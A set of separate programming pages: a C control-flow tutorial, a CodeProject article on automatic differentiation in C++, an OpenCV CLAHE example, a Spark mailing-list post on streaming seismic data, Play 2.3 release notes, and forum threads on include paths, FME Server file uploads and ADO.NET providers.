    if (num > 10)
    {
        printf("Yes");
    }
    else
    {
        printf("No");
    }
    return 0;
}

The output of the above program: if the user enters the number 12 as input, the output is Yes, and if the user enters the number 9 as input, the output is No. The if block checks whether the number is greater than 10; if the condition turns out to be true, the if block is executed, and if it fails, the else block is executed.

What is an else-if ladder in C?

When we need to chain multiple if-else statements, we create an else-if ladder. It is used when there are multiple conditions to check. The syntax for declaring the same is:

if (expression 1)
{
    // When expression 1 is true
}
else if (expression 2)
{
    // When expression 2 is true
}
else if (expression 3)
{
    // When expression 3 is true
}
else
{
    // When none of the expressions is true
}

When the first Boolean condition is true, the first block (the if block) gets executed. When the first condition is false, the second condition is checked; if it is true, the second block gets executed, and so on. If none of the conditions turns out to be true, then the last else block gets executed.

What is nested if-else in C?

Nested if-else simply means an if inside another if — yes, C allows you to write nested if-else. It is used when you have to check some condition with respect to another condition. The syntax for declaring nested if-else in C is:

if (condition-1)
{
    // when condition-1 is true
    if (condition-2)
    {
        // when condition-2 is true
    }
}

What is the switch-case statement in C?

The switch expression is evaluated once, and then the value of that expression is compared to the value of each case. If there is a match, then the associated code block is executed, and if no match is found, then the default block is executed. It is similar to the if-else statement. The syntax for declaring the switch-case statement is:

switch (expression)
{
    case x:
        // code block
        break;
    case y:
        // code block
        break;
    default:
        // code block
}

You all must have noticed two keywords above, i.e., the break and default keywords. Let's see why they are there.

What is the break keyword in switch-case?

When the C program encounters a break keyword, it breaks out of the switch block. This means that it stops the execution of further code and case testing inside that particular block. When a match is found and the job is done, it's time to break out. It saves a lot of execution time because it skips ("ignores or leaves") the execution of the rest of the code in the switch block.

What is the default keyword in switch-case?

The default keyword specifies some code to run if no match is found. It should be used at the end of the switch block, and it does not need a break.

Let us take one example demonstrating the switch-case statement:

#include <stdio.h>
int main( )
{
    int num;
    scanf("%d", &num);
    switch (num)
    {
        case 1:
            printf("Monday");
            break;
        case 2:
            printf("Tuesday");
            break;
        case 3:
            printf("Wednesday");
            break;
        case 4:
            printf("Thursday");
            break;
        case 5:
            printf("Friday");
            break;
        case 6:
            printf("Saturday");
            break;
        case 7:
            printf("Sunday");
            break;
        default:
            printf("Invalid Number");
    }
    return 0;
}

In the above program, the aim is to print the day of the week for an input of 1 to 7, and if the input is some other number then the default block is executed.

I hope you all enjoyed this particular module and gained a lot of knowledge from it; be excited about the upcoming modules. Until then, keep practicing, enjoy the learning. Happy coding!
Fast automatic differentiation (FAD) is another way of computing the derivatives of a function, in addition to the well-known symbolic and finite difference approaches. While not as popular as these two, FAD can complement them very well. It specializes in the differentiation of functions defined merely as fragments of code written in any programming language you prefer. Here I'd like to outline the benefits of this approach and describe my own implementation of FAD algorithms in C++.

FAD can be helpful for embedding differentiation capabilities in your programs. You don't really need to know how it works to use it effectively. (Still, you probably should know what differentiation is and how the derivatives of a function can be used.) This method really shines when you need to differentiate a function defined iteratively or recursively, or if the respective code fragment contains branches etc.

There is an excellent article here on CodeProject on how to implement symbolic differentiation. It also contains some notational conventions and differentiation formulae for useful functions, so I won't repeat it all here. Here dy/dx denotes a derivative of y with respect to x (a partial derivative if y also depends on arguments other than x).

There are only two things you need to know to understand how automatic differentiation works. Fortunately they are quite easy to understand. (Although, I repeat, they are not absolutely necessary to be able to use FAD.)

The first one is the so-called "chain rule" of differentiation. Suppose we have a composite function y(x) = f(g(x)), where g(x) and f(t) are differentiable at x == x0 and g(x0) respectively. Then y is also differentiable at x == x0 and its derivative is

dy/dx = df/dt * dg/dx, where dg/dx is computed for x == x0 and df/dt for t == g(x0).
If in turn the g() function is composite (for instance g(x) = h(k(x))), we can apply this rule repeatedly, extending the "chain of derivatives" until we get to functions that are not composite ("elementary functions"):

dy/dx = df/dt * dh/du * dk/dx, where x == x0, t == g(x0), u == k(x0).

Note that the f(), h() and k() functions are "elementary" (like sin, cos, exp etc.), so we already know the exact formulae for their derivatives.

This rule can be generalized for functions of more than one argument. The formulae are slightly more complex in this case, but the principle remains the same.

Now recall that many of the computational processes operating on floating-point values are nothing more than an evaluation of some composite function. For a given set of input data the respective program executes a finite sequence of "elementary" operations like +, -, *, /, sin, cos, tan, exp, log etc. The conclusion is simple and straightforward: if we could process this sequence like a composite function, we would be able to compute its derivatives, no matter how long the sequence is. Fast automatic differentiation does exactly that. (See the [1] review for more details. There have been many publications on this subject in recent years; the ideas behind FAD are really not new.)

Several FAD algorithms require this sequence to be stored somehow for further processing; other algorithms don't. One of the most popular data structures to hold this sequence is a "computational graph" (the second thing that is important for understanding FAD, along with the chain rule described above). In a computational graph (CG) the nodes correspond to the elementary operations, while the arcs connect these operations with their arguments.
See the figure below for a sample CG for a function z(x) = f(g(h(x), k(x))). ("in" denotes any input operation.)

If the code fragment contains branches, loops, recursion etc., the CG may be different for different inputs. That's why the CG is not a control flow graph or an abstract syntax tree (AST) or the like. Automatic differentiation algorithms compute the derivatives of a function at the same point the function is evaluated at (unlike symbolic methods).

Once the CG has been recorded, one can traverse it either from the arguments to the functions of interest (from x to z in the example above, i.e. "forward") or in the opposite direction ("reverse") to compute the derivatives. Hence there are two main classes of FAD algorithms, namely "forward" and "reverse".

"Forward" FAD computes the derivative of every function with respect to one given argument in one CG traversal. (Although some forward algorithms don't require the CG to be actually stored.) "Reverse" FAD computes the whole gradient (derivatives with respect to every independent variable) of one given function in one traversal of the CG. This can be beneficial when dealing with a small number of functions of many arguments each. Such functions can arise, for example, in matrix manipulations etc.

The "forward"-like FAD algorithm can also be used to estimate the inaccuracy of the function value accumulated during the computation. As you probably know, floating point values are often stored with finite relative precision. For example, 1.0 and (1.0 + 1.0e-16) stored as double precision IEEE-compliant floating point numbers are usually considered the same. These "rounding errors" can accumulate and lead to some uncertainty in the computed values. Rounding error estimation (REE) algorithms estimate these uncertainties (using methods similar to interval calculus).
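Before looking at the C++ implementation, the forward-mode idea can be condensed into a tiny Python sketch (the Dual class below is mine, not part of any library): each value carries its derivative alongside it, and every overloaded operation applies the chain rule from the previous section.

```python
import math

class Dual:
    """A (value, derivative) pair; operations propagate derivatives."""
    def __init__(self, val, der=0.0):
        self.val, self.der = val, der

    def __mul__(self, other):
        other = other if isinstance(other, Dual) else Dual(other)
        # product rule: (uv)' = u'v + uv'
        return Dual(self.val * other.val,
                    self.der * other.val + self.val * other.der)
    __rmul__ = __mul__

def sin(x):  # chain rule: (sin u)' = cos(u) * u'
    return Dual(math.sin(x.val), math.cos(x.val) * x.der)

def cos(x):  # chain rule: (cos u)' = -sin(u) * u'
    return Dual(math.cos(x.val), -math.sin(x.val) * x.der)

# dz/dx for z = sin(2 * cos(x)) at x = 0.5, seeding dx/dx = 1
x = Dual(0.5, 1.0)
z = sin(2 * cos(x))
# analytic check: dz/dx = cos(2*cos(x)) * (-2*sin(x))
expected = math.cos(2 * math.cos(0.5)) * (-2 * math.sin(0.5))
print(abs(z.der - expected) < 1e-12)  # True
```

This is exactly what an "active double" type does in C++, with the extra option of recording each operation into a CG for later reverse-mode traversal.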
One common way to implement FAD algorithms in C++ is to use overloaded operators and functions for special "active variable" classes. (There are other ways, of course. Some of these other methods rely heavily on parsing, which is really beyond the scope of this article. One can find some information on these methods in [2].) Consider the following code fragment:

double x0, y0;
double x, y, f;
// get x0 and y0 from somewhere (ask the user, for example)
//...
x = x0; // initialize the arguments (x and y)
y = y0;
f = sin(y * cos(x));

In order to employ FAD algorithms you need to change the types of the variables of interest (x, y and f) from double to CADouble ("active double") provided by a FAD library. You also need to mark the beginning and the end of an active code section (a fragment that defines the function to be differentiated along with the initialization of its arguments). Then you get the following:

double x0, y0;
CADouble x, y, f; // instead of "double x, y, f;"
CActiveSection as; // mark the beginning of the 'active section'
as.begin(); // start recording operations in a computational graph (CG)
x = x0; // initialize the arguments (x and y)
y = y0;
f = sin(y * cos(x));
as.end(); // stop recording, the active section ends

These code fragments look quite similar, don't they? In both cases f(x, y) is calculated, but in the second one the appropriate sequence of elementary operations (the CG) is also recorded. The CG can be used later to compute the derivatives of f(), like this:

double out_x, out_y; // here the derivative values will be stored
// compute the df/dx partial derivative using forward mode FAD
as.forward(x, f, out_x);
// compute the df/dy partial derivative using forward mode FAD
as.forward(y, f, out_y);

Useful operators and functions are overloaded for CADouble instances, so that these operations not only do what they are usually meant to do but also record themselves in the CG. That's it. With a little change in your code you get differentiation capabilities embedded in it.

Of course, there is no free lunch. Using FAD can slow down execution of the affected code fragment by a factor of 2 to 400 (or even more, depending on the FAD algorithms you employ, your hardware etc.). Traversing a large CG involves a lot of memory access operations, which can, of course, be slower than simply performing a sequence of mathematical operations. Note that the methods that do not require the CG to be actually stored (the so-called "fast forward" and "fast REE" algorithms) are usually faster and need less memory.

The "Reed Library" I have written provides the following. ("Reed" is an acronym for "Rounding Error Estimation and Differentiation". It turned out that REE functionality was mandatory in my work while using FAD seemed to be optional; that's why REE comes first in this name. FAD was also very helpful to me more than once, though.)

A detailed reference of the classes and methods can be found in the provided Doxygen-generated documentation (see /reed/doc/reed library v01.chm). I'll mention only the key points here. Most of the useful stuff in the library resides in namespace reed. The currently supported elementary operations are:

- +, -, *, /
- +=, -=, *=, /=
- fmin(x, y), fmax(x, y)
- condAssign(x, y)
- abs(x)
- sin(x), cos(x), tan(x)
- exp(x), log(x)
- sqrt(x)

Several of the operations above are not everywhere differentiable (e.g. abs(x) has no derivative at x == 0). When evaluated at these points, some value will still be computed and the system won't crash, but of course this value cannot be trusted. (Perhaps I'll add a flag or something like that to indicate this condition in future versions. Unfortunately I have no time for this now.)

Relational operations (==, >, < etc.) are also overloaded for CADouble and CADoubleF<...>. In CG-based methods they are used to detect whether the CG structure must change for new values of the arguments. In "fast" methods they simply return the result of comparing the respective floating point values.

The value of an active variable can be accessed via the setValue() and getValue() methods.

Instances of the reed::CADouble class can be created both within and outside an active section. But (for efficiency reasons) you can assign something to them and use the overloaded operations on them within an active section only. Failure to do this will cause an assertion in debug mode and undefined behaviour in release.

To store CGs I chose to create a special memory allocator for fixed-size objects that is much faster than using the default new and delete. See reed/mem_pool.h. One can find information on building such allocators, for instance, in [3].

All CG-based FAD algorithms are implemented as methods of the reed::CActiveSection class. Among these are:

int forward(CADouble arg, CADouble func, double& out);
Computes the derivative of function func with respect to argument arg using forward mode FAD and returns the result in out. The return value is insignificant for now.

int reverse(CADouble arg, CADouble func, double& out);
Does the same as above using reverse mode.

int ree_lower(std::vector<CADouble>& arg, std::vector<double>& err);
Computes the lower estimate of an error. By default the arguments are supposed to be stored with machine accuracy (i.e. with a relative precision of about 1.1e-16 for an IEEE-compliant normalized double value). You can override this by setting initial absolute error values for the variables in arg; these values are passed in the err vector. After ree_lower() returns, you can retrieve the accumulated error value for any variable via the CADouble::getAcc() method, e.g. double e = f.getAcc().

There are other overloaded versions of these methods that can be useful. See the documentation and the examples provided with this article for details.

To use these methods you should #include reed/adouble.h and reed/asection.h in your code and link your project with the reed/lib/reed.lib library (or reed_d.lib for the debug version). See the provided examples ("simple", "iter" and "gradient").

The "fast" forward and REE algorithms are implemented in reed/adouble_f.h. You don't need any active sections or a CG to use these. Nor do you need reed.lib. Just #include reed/adouble_f.h in your project, add util.cpp to it, and you are all set. The "iter_f" example shows how you can use these "fast" algorithms.

As I mentioned above, you can use FAD algorithms (both CG-based and "fast" versions) to differentiate iteratively defined functions, functions with branches etc., provided the functions are differentiable at the point of interest. Consider the following example (see the "iter_f" project from the zip archive with the examples for a complete implementation). Suppose y = y(x) is defined like this:

double x0 = ...; // set the argument value or ask the user for it
size_t m = ...; // Number of iterations to perform. Let the user define it too.
// Note: the value of m can be unknown at compile time. FAD will handle this.
double x, y;
x = x0; // argument
// ... m iterations computing y from x ...

Need to compute dy/dx at x == x0? No problem. The resulting code fragment uses the "fast" forward method, but you can use the CG-based methods too. Change the types as described above, set the initial derivative value (dx/dx == 1.0) and you'll get:

double x0 = ...; // set the argument value or ask the user for it
size_t m = ...; // Number of iterations to perform. Let the user define it too.
CADoubleFF x, y; // for REE use CADoubleRee instead.
// Active sections are not necessary for the "fast forward" and "fast REE"
// algorithms because these algorithms do not require the CG to be stored.
x = x0; // argument
x.setAcc(1.0); // Accumulated derivative is 1.0 in x (dx/dx). By default it is zero.
// ... the same m iterations computing y from x ...

The value of the derivative dy/dx will be computed along with y(x) at x == x0. You can then retrieve these values via y.getAcc() and y.getValue(), respectively. Pretty easy, isn't it?

The "FADcpp_examples" Visual Studio solution contains 5 projects. It was tested under MS Visual C++ 7.1 only. (Perhaps it won't work under 6.0 or earlier due to some template tricks I used; I haven't tested it under 6.0 though.) The "FADcpp_examples/reed" directory contains the "Reed Library" itself (code and documentation). You can rebuild the library using the "reed_lib" project of this solution. The other 4 projects are examples of using the library, e.g. differentiating f = sin(y * cos(x)) and computing the gradient of a quadratic form f(x) = (x * Ax) for a matrix A and x = (x0, x1, x2).

This article is an outline of the so-called fast automatic differentiation (FAD). FAD can be of help when you need to embed differentiation capabilities in your program and/or to handle functions with branches, loops, recursion etc. This way automatic differentiation can complement symbolic differentiation. The latter is mostly used when we have a formula (a "closed expression") for the function to be differentiated; if we don't, FAD can often help. I hope my implementation of the fast automatic differentiation and rounding error estimation algorithms will prove useful to you. Give it a try! Any feedback will be appreciated.
http://www.codeproject.com/Articles/15432/Fast-Automatic-Differentiation-in-C?fid=337310&df=10000&mpp=10&noise=1&prof=True&sort=Position&view=None&spc=Relaxed
Histograms - 2: Histogram Equalization

Plain histogram equalization (cv2.equalizeHist()) considers the global contrast of the image, which can wash out detail in regions that are much brighter or darker than the rest.

CLAHE (Contrast Limited Adaptive Histogram Equalization)

To solve this problem, adaptive histogram equalization is used. In this, the image is divided into small blocks called "tiles" (tileGridSize is 8x8 by default in OpenCV). Each of these blocks is then histogram equalized as usual. So in a small area, the histogram would confine to a small region (unless there is noise). If noise is there, it will be amplified. To avoid this, contrast limiting is applied. If any histogram bin is above the specified contrast limit (by default 40 in OpenCV), those pixels are clipped and distributed uniformly to the other bins before applying histogram equalization. After equalization, bilinear interpolation is applied to remove artifacts at the tile borders.

import numpy as np
import cv2

img = cv2.imread('tsukuba_l.png', 0)

# create a CLAHE object (Arguments are optional).
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))
cl1 = clahe.apply(img)

cv2.imwrite('clahe_2.jpg', cl1)
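For reference, the plain (global) equalization that CLAHE refines is just a remap of each intensity through the normalized cumulative histogram. A minimal pure-Python sketch; the toy 8-pixel "image" is made up, and OpenCV's cv2.equalizeHist applies the same formula with its own rounding details:

```python
def equalize(pixels, levels=256):
    """Global histogram equalization: map each intensity through the
    normalized cumulative histogram (CDF)."""
    hist = [0] * levels
    for p in pixels:
        hist[p] += 1
    cdf, total = [], 0
    for h in hist:
        total += h
        cdf.append(total)
    cdf_min = next(c for c in cdf if c > 0)  # first non-empty bin
    n = len(pixels)
    # classic formula: new = round((cdf(v) - cdf_min) / (n - cdf_min) * (levels - 1))
    lut = [round((c - cdf_min) / max(n - cdf_min, 1) * (levels - 1)) for c in cdf]
    return [lut[p] for p in pixels]

dark = [10, 10, 11, 12, 12, 12, 13, 14]  # a low-contrast "image"
bright = equalize(dark)
```

The narrow band 10..14 gets stretched across the full 0..255 range, which is exactly the contrast gain equalization is after.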
http://www.voidcn.com/article/p-pjjjareo-bro.html
Have a look at this guide here: You should be able to send your sensor data to a Kafka topic, which Spark will subscribe to. You may need to use an Input DStream to connect Kafka to Spark. Taylor -----Original Message----- From: zakhavan <zakhavan@unm.edu> Sent: Tuesday, October 2, 2018 1:16 PM To: user@spark.apache.org Subject: RE: How to do sliding window operation on RDDs in Pyspark? Thank you, Taylor for your reply. The second solution doesn't work for my case since my text files are getting updated every second. Actually, my input data is live such that I'm getting 2 streams of data from 2 seismic sensors and then I write them into 2 text files for simplicity and this is being done in real-time and text files get updated. But it seems I need to change my data collection method and store it as 2 DStreams. I know Kafka will work but I don't know how to do that because I will need to implement a custom Kafka consumer to consume the incoming data from the sensors and produce them as DStreams. The following code is how I'm getting the data and write them into 2 text files. Do you have any idea how I can use Kafka in this case so that I have DStreams instead of RDDs? 
from obspy.clients.seedlink.easyseedlink import create_client
from obspy import read
import numpy as np
import obspy
from obspy import UTCDateTime

def handle_data(trace):
    print('Received new data:')
    print(trace)
    print()
    if trace.stats.network == "IU":
        trace.write("/home/zeinab/data1.mseed")
        st1 = obspy.read("/home/zeinab/data1.mseed")
        for i, el1 in enumerate(st1):
            f = open("%s_%d" % ("out_file1.txt", i), "a")
            f1 = open("%s_%d" % ("timestamp_file1.txt", i), "a")
            np.savetxt(f, el1.data, fmt="%f")
            np.savetxt(f1, el1.times("utcdatetime"), fmt="%s")
            f.close()
            f1.close()
    if trace.stats.network == "CU":
        trace.write("/home/zeinab/data2.mseed")
        st2 = obspy.read("/home/zeinab/data2.mseed")
        for j, el2 in enumerate(st2):
            ff = open("%s_%d" % ("out_file2.txt", j), "a")
            ff1 = open("%s_%d" % ("timestamp_file2.txt", j), "a")
            np.savetxt(ff, el2.data, fmt="%f")
            np.savetxt(ff1, el2.times("utcdatetime"), fmt="%s")
            ff.close()
            ff1.close()

client = create_client('rtserve.iris.washington.edu:18000', handle_data)
client.select_stream('IU', 'ANMO', 'BHZ')
client.select_stream('CU', 'ANWB', 'BHZ')
client.run()

Thank you,
Zeinab

--
Sent from: 

---------------------------------------------------------------------
To unsubscribe e-mail: user-unsubscribe@spark.apache.org
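Whichever transport ends up feeding Spark, the sliding-window part itself is just "keep the last N samples per stream and aggregate over them"; Spark's window() applies the same idea to DStream batches. A stripped-down, Kafka-free sketch of that core idea (class and method names are mine, not Spark's API):

```python
from collections import deque

class SlidingWindow:
    """Keep only the most recent `size` samples of a stream."""
    def __init__(self, size):
        self.buf = deque(maxlen=size)  # old samples fall off automatically

    def push(self, sample):
        self.buf.append(sample)

    def mean(self):
        return sum(self.buf) / len(self.buf) if self.buf else None

# two independent streams, like the two seismic sensors
w1, w2 = SlidingWindow(3), SlidingWindow(3)
for s1, s2 in zip([1.0, 2.0, 3.0, 4.0], [10.0, 20.0, 30.0, 40.0]):
    w1.push(s1)
    w2.push(s2)
```

Each incoming sample displaces the oldest one, so any per-window statistic (mean, RMS, cross-correlation between the two sensors) is always computed over the freshest N values.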
http://mail-archives.us.apache.org/mod_mbox/spark-user/201810.mbox/%3CSN6PR2101MB0894947F82F069DDD48D0D2886E80@SN6PR2101MB0894.namprd21.prod.outlook.com%3E
§What's new in Play 2.3
This page highlights the new features of Play 2.3. If you want to learn about the changes you need to make to migrate to Play 2.3, check out the Play 2.3 Migration Guide.
§Activator
The first thing you'll notice about Play 2.3 is that the play command has become the activator command. Play has been updated to use Activator so that we can:
- Extend the range of templates we provide for getting started with Play projects. Activator supports a much richer library of project templates. Templates can also include tutorials and other resources for getting started. The Play community can contribute templates too.
- Provide a nice web UI for getting started with Play, especially for newcomers who are unfamiliar with command line interfaces. Users can write code and run tests through the web UI. For experienced users, the command line interface is available just like before.
- Make Play's high productivity development approach available to other projects. Activator isn't just for Play. Other projects can use Activator too.
In the future Activator will get even more features, and these features will automatically benefit Play and other projects that use Activator. Activator is open source, so the community can contribute to its evolution.
§Auto Plugins
Play now uses sbt 0.13.5. This version brings a new feature named "auto plugins" which, in essence, permits a large reduction in settings-oriented code for your build files.
§Asset Pipeline and Fingerprinting
sbt-web brings the notion of a highly configurable asset pipeline to Play. One new capability for Play 2.3 is the support for asset fingerprinting, similar in principle to Rails asset fingerprinting. A consequence of asset fingerprinting is that we now use far-future cache expiries when assets are served. The net result of this is that your users will experience faster downloads when they visit your site, given the aggressive caching strategy that a browser is now able to employ.
§Default ivy cache and local repository
Play now uses the default ivy cache and repository, in the .ivy2 folder in the user's home directory. This means Play will now integrate better with other sbt builds, not requiring artifacts to be cached multiple times, and allowing the sharing of locally published artifacts.
§Java improvements
§Java 8
Play 2.3 has been tested with Java 8. Your project will work just fine with Java 8; there is nothing special to do other than ensuring that your Java environment is configured for Java 8. There is a new Activator sample available for Java 8:
Our documentation has been improved with Java examples in general and, where applicable, Java 8 examples. Check out some examples of asynchronous programming with Java 8. For a complete overview of going Reactive with Java 8 and Play check out this blog:
§Java performance
We've worked on Java performance. Compared to Play 2.2, throughput of simple Java actions has increased by 40-90%. Here are the main optimizations:
- Reducing thread switches for Java actions and body parsers.
- Caching more route information and using per-route caching rather than a shared Map.
- Reducing body parsing overhead for GET requests.
- Using a unicast enumerator for returning chunked responses.
Some of these changes also improved Scala performance, but Java had the biggest performance gains and was the main focus of our work. Thank you to YourKit for supplying the Play team with licenses to make this work possible.
§Scala 2.11
Play 2.3 is the first release of Play to have been cross built against multiple versions of Scala, both 2.10 and 2.11. You can select which version of Scala you would like to use by setting the scalaVersion setting in your build.sbt or Build.scala file.
For Scala 2.11:
scalaVersion := "2.11.1"
For Scala 2.10:
scalaVersion := "2.10.4"
§Play WS
§Separate library
The WS client library has been refactored into its own library which can be used outside of Play.
You can now have multiple WSClient objects, rather than only using the WS singleton.
Java
WSClient client = new NingWSClient(config);
Promise<WSResponse> response = client.url("").get();
Scala
val client: WSClient = new NingWSClient(config)
val response = client.url("").get()
Each WS client can be configured with its own options. This allows different web services to have different settings for timeouts, redirects and security options. The underlying AsyncHttpClient object can also now be accessed, which means that multi-part form and streaming body uploads are supported.
§WS Security
WS clients have settings for comprehensive SSL/TLS configuration. WS client configuration is now more secure by default.
§Actor WebSockets
A method to use actors for handling WebSocket interactions has been incorporated for both Java and Scala:
Java
public static WebSocket<String> socket() {
    return WebSocket.withActor(MyWebSocketActor::props);
}
Scala
def webSocket = WebSocket.acceptWithActor[JsValue, JsValue] { req => out =>
    MyWebSocketActor.props(out)
}
§Results restructuring completed
In Play 2.2, a number of new result types were introduced and old result types deprecated. Play 2.3 finishes this restructuring. See Results restructure in the Migration Guide for more information.
§Anorm
There are various fixes included in Play 2.3's Anorm (type safety, option parsing, error handling, …) and new interesting features.
- String interpolation is available to write SQL statements more easily, with less verbosity (passing arguments) and performance improvements (up to 7x faster processing of parameters). e.g. SQL"SELECT * FROM table WHERE id = $id"
- Multi-value (sequence/list) parameters can be passed. e.g. SQL"""SELECT * FROM Test WHERE cat IN (${Seq("a", "b", "c")})"""
- It's now possible to parse columns by position. e.g. val parser = long(1) ~ str(2) map { case l ~ s => ??? }
- Query results include not only data, but also the execution context (with SQL warnings).
- More types are supported as parameters and as columns: java.util.UUID, numeric types (Java/Scala big decimal and integer, more column conversions between numerics), temporal types (java.sql.Timestamp), character types.
§Custom SSLEngine for HTTPS
The Play server can now use a custom SSLEngine. This is also useful in cases where customization is required, such as in the case of client authentication.
https://www.playframework.com/documentation/2.5.x/Highlights23
Hi there! I have come across a somewhat unusual(?) problem regarding include paths. Hopefully some of you guys have a way to get around it. Here it is: In a project that I'm involved in, some people decided to use complete unix paths for include files... Like this:

#ifndef SOME_FILE__
#define SOME_FILE__
#include "/clearcase_rootdir/some_vob/subdir1/subdir2/subdir3/someFile.h"
#endif

The problem here is that I'm on a Windows XP computer and there is no access to this path under Windows. The closest one can get is to map a drive letter to M:\some_clearcase_view\ (the ClearCase root in Windows), but that would take me to the /subdir1/ level of the above path and not the "/clearcase_rootdir" that I want to get hold of... Has anyone got any suggestions on how to solve the issue? Anything goes here. I've been thinking about whether there is some preprocessor directive that states something like "#ignore path" for include files and just uses the filename and the standard paths specified in the environment and makefile... Regards
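If editing the offending headers is acceptable, another angle is a one-off script that strips the absolute prefixes and lets the compiler's include search path (-I on gcc, /I in Visual Studio, pointed at the mapped M:\ view) resolve the bare names. A rough sketch of such a fixer; the path is just this thread's example:

```python
import re

# matches #include "<absolute unix path>/<file>" and captures the bare file name
ABS_INCLUDE = re.compile(r'#include\s+"/[^"]*/([^"/]+)"')

def strip_include_paths(source):
    """Rewrite absolute include paths to bare file names."""
    return ABS_INCLUDE.sub(r'#include "\1"', source)

code = '#include "/clearcase_rootdir/some_vob/subdir1/subdir2/subdir3/someFile.h"\n'
fixed = strip_include_paths(code)
```

Relative includes such as #include "local.h" are left alone, since the pattern only fires on paths that start with a slash.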
http://cboard.cprogramming.com/cplusplus-programming/109499-ignore-paths-printable-thread.html
I want to upload some files for a specific workbench using HTTP. I'm using Python for this with the requests library, but I'm having difficulty getting it to work. My python code is as follows:

with open(file_path, 'rb') as file:
    url = f"{fme_url}/fmedataupload/{script_location}"
    data = {
        'custom_file': {
            'value': file.read(),
            'options': {
                'contentType': 'application/octet-stream',
                'filename': file_name,
            }
        },
        'opt_namespace': directory,
        'opt_fullpath': True
    }
    token = get_token()
    headers = {
        'content-type': 'application/x-www-form-urlencoded',
        'Authorization': f"fmetoken token={token}",
    }
    return requests.post(url, data=data, headers=headers, json=True)

I do get a 200 OK response, so authorization is fine, but the file isn't uploaded. It even creates a directory at the right spot. The response is as follows:

<Response [200]> {"serviceResponse": {
  "statusInfo": {"status": "success"},
  "session": "foo",
  "files": {
    "path": "",
    "folder": [{
      "path": "$(FME_DATA_REPOSITORY)/main_repository/script_name.fmw/foo",
      "name": ""
    }]
  }
}}

The data upload documentation () simply lists 'Upload a single file or multiple files using a simple form submission that uses HTTP POST.', which is not helpful. I'm using Python 3.8 and FME Server 2019.2. My goal is to upload the required files, then start a workbench, and finally retrieve the result, all using Python. Preferably, the FME Server account that Python uses has as few permissions as possible.

@arjanboogaart, Can you confirm the version of FME Server you are using here? Python 3? It could be an issue we need to look at for sure. Thanks for posting!

Python 3.8 and FME Server 2019.2. I have a suspicion it has to do with how python requests sends the form data, as we have a similar setup in Node.js which is working. It's strange how it sends a 200 OK response, I would expect a 400 if there's something wrong with my request.

@arjanboogaart, I suspect you are not using python3.8 with FME...
it won't work as we've not added support for that yet. Here's the export. UploadExamplePostman.json.zip Let us know if this helps.

I got curious about your mention that the file was NOT being uploaded, so I did go test this in Postman using the POST. In my testing, using FME Server 2019.2, I can confirm a file is uploaded and a folder is created. Are you looking in the /system/temp/upload location? Does the token you are using have enough permissions? (I would expect an error if not, so this is likely not your problem.) Because the files are being uploaded by the Data Upload Service, they are volatile (non-persistent); you will find them in the FME Server temp file location. That location is determined in the service properties file. By default:

# UPLOAD_DIR
UPLOAD_DIR=<System share>/resources/system/temp/upload

Do you mind sharing the Postman request? I believe there is an 'export' option. That might help me recreate it in Python.

This example uses HTTP PUT instead of POST. PUT doesn't support custom directory names.

Hi @arjanboogaart, So you want to upload some files for a particular workspace... are they to persist? I'm not sure if this is going to help you, but you could try the FME Server API for uploading a resource for a workspace and then delete the resource at some time later when no longer needed. I can only share this as guidance and unfortunately, I've not attempted to port it to python... but you could likely have some success. From Postman:

POST the resource or file:
DELETE the resource or file:

@arjanboogaart Have you tried FMEServerResourceConnector or HTTPCaller? My question is about using the FME Server REST API in Python. This is not from inside an FME workbench, but as a standalone Python application.
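As background, "a simple form submission that uses HTTP POST" means a multipart/form-data body on the wire; with requests you would normally pass the file under files= rather than as a nested dict under data= (which gets flattened into a form-urlencoded string). The stdlib-only sketch below builds such a body by hand so the structure is visible; the field names mirror the question, everything else is a placeholder:

```python
import uuid

def multipart_body(fields, file_field, filename, file_bytes):
    """Hand-roll a multipart/form-data body; returns (content_type, body)."""
    boundary = uuid.uuid4().hex
    parts = []
    for name, value in fields.items():
        parts.append((
            '--{}\r\n'
            'Content-Disposition: form-data; name="{}"\r\n\r\n'
            '{}\r\n').format(boundary, name, value).encode())
    parts.append((
        '--{}\r\n'
        'Content-Disposition: form-data; name="{}"; filename="{}"\r\n'
        'Content-Type: application/octet-stream\r\n\r\n').format(
            boundary, file_field, filename).encode() + file_bytes + b'\r\n')
    parts.append('--{}--\r\n'.format(boundary).encode())
    return 'multipart/form-data; boundary={}'.format(boundary), b''.join(parts)

ctype, body = multipart_body(
    {'opt_namespace': 'mydir', 'opt_fullpath': 'true'},
    'custom_file', 'input.csv', b'a,b\n1,2\n')
# POST `body` with headers: Content-Type: <ctype>, plus the fmetoken Authorization header
```

With requests itself, the equivalent is roughly requests.post(url, files={'custom_file': (file_name, file.read(), 'application/octet-stream')}, data={'opt_namespace': directory}, headers={'Authorization': ...}), letting the library set the multipart Content-Type instead of forcing application/x-www-form-urlencoded.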
https://knowledge.safe.com/questions/109808/uploading-files-using-python-via-data-upload-servi.html
Microsoft split ADO.NET into two camps: the SqlClient camp and the OleDb camp. The SqlClient camp represents Microsoft SQL Server 7.0 and higher, and the OleDb camp handles everything else, including Microsoft Access, Microsoft SQL Server 6.5, Oracle, UDB, Sybase, Informix, and others. The notion of a camp refers to database providers. In addition to the two-camp model, Microsoft's .NET Framework supports extending ADO.NET by allowing vendors to implement their own provider classes. The result is that any database supplier could create its own custom provider classes for ADO.NET.

ADO.NET in general is made up of the System.Data and System.Xml namespaces. Classes that are general to ADO.NET are typically found in the System.Data namespace. For example, DataSet, a general class shared between providers, is defined in System.Data. Classes that are specific to a provider camp can be found in System.Data.OleDb or System.Data.SqlClient. For classes in either camp to work with the general DataSet class, each camp must support the same basic capabilities. For example, to get data into a DataSet class you need a connection. There is a connection class in the OleDb namespace as well as one in the SqlClient namespace. These namespace-specific classes employ a prefix naming convention: OleDb classes are prefixed with OleDb, and SqlClient classes are prefixed with Sql. Thus the OleDb connection class is suitably named OleDbConnection; the SqlClient connection class, SqlConnection.

